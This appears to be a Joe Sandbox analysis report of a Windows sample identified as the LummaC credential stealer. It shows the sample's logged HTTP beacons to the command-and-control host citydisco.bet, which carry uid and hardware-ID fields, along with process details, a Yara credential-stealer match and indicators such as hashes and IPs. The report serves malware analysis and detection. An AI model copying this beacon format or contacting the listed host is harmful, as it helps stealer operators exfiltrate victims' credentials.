65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 Data Ascii: --JkM2XnzkV90aH3Content-Disposition: form-data; name="uid"72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b--JkM2XnzkV90aH3Content-Disposition: form-data; name="pid"1--JkM2XnzkV90aH3Content-Disposition: form-data; name="hwid"A
2025-03-13 12:33:40 UTC	809	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O62HjBXtaZ%2Brgu6%2FPU9KfOTt%2F61CFDWC97Q0fT9vx1%2FdkrQOiCj41BKSDZP524kz8RBpSKT8JilZPfhLaIs2hxZZdqxli7VAREjjo2a06ticLAJAuLTp7dT9fNXIEKGk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8fa24d51e938-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14001&min_rtt=13997&rtt_var=3945&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2002&delivery_rate=206576&cwnd=244&unsent_bytes=0&cid=f4a60280b05917e0&ts=941&x=0"
2025-03-13 12:33:40 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}
2025-03-13 12:33:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49712	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:42 UTC	264	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 135 Host: citydisco.bet
2025-03-13 12:33:42 UTC	135	OUT	Data Raw: 75 69 64 3d 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 26 63 69 64 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 41 31 35 30 45 45 39 35 33 41 31 42 42 45 44 44 38 43 39 41 31 43 34 32 45 37 42 33 46 32 39 45 Data Ascii: uid=72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b&cid=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=A150EE953A1BBEDD8C9A1C42E7B3F29E
2025-03-13 12:33:42 UTC	788	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:42 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sv1B81QYw3d%2FCtG%2Fsi1PM9g6cb6WxLRQAmy%2FQvWzEk%2FimQXhiPQSAZ7M0aQGKsjByHJC7jZG6PF%2BS%2Bx%2B96oriRISeJ8m67Lc3672PExApW4oHB5lDdi%2FozU%2F1En185Hw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8fb07b847b21-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13619&min_rtt=13496&rtt_var=3884&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1035&delivery_rate=211017&cwnd=246&unsent_bytes=0&cid=75b98fb38392a4b3&ts=882&x=0"
2025-03-13 12:33:42 UTC	43	IN	Data Raw: 76 b9 ff 43 44 dd be d8 a6 fd 56 2d 06 6f c1 97 07 f8 26 4e 53 4f a4 30 4f 25 3f 11 c0 a6 d2 aa 86 fe 8b c2 32 65 39 a3 eb ee 4d Data Ascii: vCDV-o&NSO0O%?2e9M

Target ID:	0
Start time:	08:33:23
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\SoftWare(1).exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SoftWare(1).exe1.exe"
Imagebase:	0x300000
File size:	775'488 bytes
MD5 hash:	DCA5A4D306B6166C5A4D4756707712E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:33:23
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\SoftWare(1).exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SoftWare(1).exe1.exe"
Imagebase:	0x300000
File size:	775'488 bytes
MD5 hash:	DCA5A4D306B6166C5A4D4756707712E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1554884834.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SoftWare(1).exe1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
SoftWare(1).exe1.exe